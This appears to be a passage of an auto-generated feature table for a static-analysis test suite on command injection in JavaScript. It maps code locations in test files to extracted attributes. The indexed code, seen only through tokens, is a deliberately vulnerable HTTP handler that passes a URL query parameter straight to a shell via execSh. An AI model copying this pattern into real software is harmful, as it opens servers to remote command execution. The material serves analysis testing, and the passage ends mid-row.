| true | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:34:14:37 | true | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:34:14:37 | true | receiverName | url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:40:14:44 | query | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:40:14:44 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:40:14:44 | query | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:40:14:44 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:40:14:44 | query | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:46:14:49 | path | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:46:14:49 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:46:14:49 | path | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:46:14:49 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:14:46:14:49 | path | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:10 | execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:10 | execSh | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:10 | execSh | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:10 | execSh | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:10 | execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:15 | exceptional return of execSh(cmd) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:15 | exceptional return of execSh(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:15 | exceptional return of execSh(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:15 | exceptional return of execSh(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:15 | exceptional return of execSh(cmd) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:15 | execSh(cmd) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:15 | execSh(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:15 | execSh(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:15 | execSh(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:5:15:15 | execSh(cmd) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:12:15:14 | cmd | CalleeFlexibleAccessPath | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:12:15:14 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:12:15:14 | cmd | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:12:15:14 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:12:15:14 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path execSh cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:12:15:14 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:15:12:15:14 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:0 | this | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:0 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | cp | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | cp | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | require | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:1:1:1 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:7:1:8 | cp | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:7:1:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:7:1:8 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:7:1:8 | cp | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:7:1:35 | cp | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:7:1:35 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:7:1:35 | cp | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:7:1:35 | cp = re ... ocess') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:7:1:35 | cp = re ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:7:1:35 | cp = re ... ocess') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:18 | require | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:18 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:35 | exceptional return of require ... ocess') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:35 | exceptional return of require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:35 | exceptional return of require ... ocess') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:35 | require ... ocess') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:35 | require ... ocess') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:12:1:35 | require ... ocess') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:20:1:34 | 'child_process' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:20:1:34 | 'child_process' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:20:1:34 | 'child_process' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:20:1:34 | 'child_process' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:20:1:34 | 'child_process' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:1:20:1:34 | 'child_process' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:5:2:8 | http | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:5:2:8 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:5:2:8 | http | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:5:2:26 | http | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:5:2:26 | http | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:5:2:26 | http | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:5:2:26 | http = ... 'http') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:5:2:26 | http = ... 'http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:5:2:26 | http = ... 'http') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:18 | require | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:18 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:26 | exceptional return of require('http') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:26 | exceptional return of require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:26 | exceptional return of require('http') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:26 | require('http') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:26 | require('http') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:12:2:26 | require('http') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:20:2:25 | 'http' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:20:2:25 | 'http' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:20:2:25 | 'http' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:20:2:25 | 'http' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:20:2:25 | 'http' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:2:20:2:25 | 'http' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:5:3:7 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:5:3:7 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:5:3:7 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:5:3:24 | url | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:5:3:24 | url | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:5:3:24 | url | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:5:3:24 | url = require('url') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:5:3:24 | url = require('url') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:5:3:24 | url = require('url') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:17 | require | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:17 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:17 | require | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:24 | exceptional return of require('url') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:24 | exceptional return of require('url') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:24 | exceptional return of require('url') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:24 | require('url') | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:24 | require('url') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:11:3:24 | require('url') | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:19:3:23 | 'url' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:19:3:23 | 'url' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:19:3:23 | 'url' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:19:3:23 | 'url' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:19:3:23 | 'url' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:3:19:3:23 | 'url' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:5:0 | this | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:5:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:5:0 | this | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:5:0 | this | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:5:0 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | 'arguments' object of function getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | 'arguments' object of function getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | 'arguments' object of function getShell | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | 'arguments' object of function getShell | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | 'arguments' object of function getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | exceptional return of function getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | exceptional return of function getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | exceptional return of function getShell | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | exceptional return of function getShell | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | exceptional return of function getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | functio ... }\\n} | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | functio ... }\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | functio ... }\\n} | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | return of function getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | return of function getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | return of function getShell | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | return of function getShell | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:1:11:1 | return of function getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:10:5:17 | getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:10:5:17 | getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:10:5:17 | getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:10:5:17 | getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:10:5:17 | getShell | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:10:5:17 | getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:5:10:5:17 | getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:15 | process | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:15 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:15 | process | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:15 | process | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:15 | process | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:24 | process.platform | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:24 | process.platform | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:24 | process.platform | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:24 | process.platform | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:24 | process.platform | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:36 | process ... 'win32' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:36 | process ... 'win32' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:36 | process ... 'win32' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:36 | process ... 'win32' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:9:6:36 | process ... 'win32' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:17:6:24 | platform | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:17:6:24 | platform | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:17:6:24 | platform | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:17:6:24 | platform | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:17:6:24 | platform | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:30:6:36 | 'win32' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:30:6:36 | 'win32' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:30:6:36 | 'win32' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:30:6:36 | 'win32' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:6:30:6:36 | 'win32' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:16:7:40 | { cmd: ... '/C' } | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:16:7:40 | { cmd: ... '/C' } | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:16:7:40 | { cmd: ... '/C' } | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:16:7:40 | { cmd: ... '/C' } | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:16:7:40 | { cmd: ... '/C' } | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:20 | cmd | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:20 | cmd | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:20 | cmd | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:20 | cmd | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:20 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:27 | cmd: 'cmd' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:27 | cmd: 'cmd' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:27 | cmd: 'cmd' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:27 | cmd: 'cmd' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:27 | cmd: 'cmd' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:27 | cmd: 'cmd' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:27 | cmd: 'cmd' | 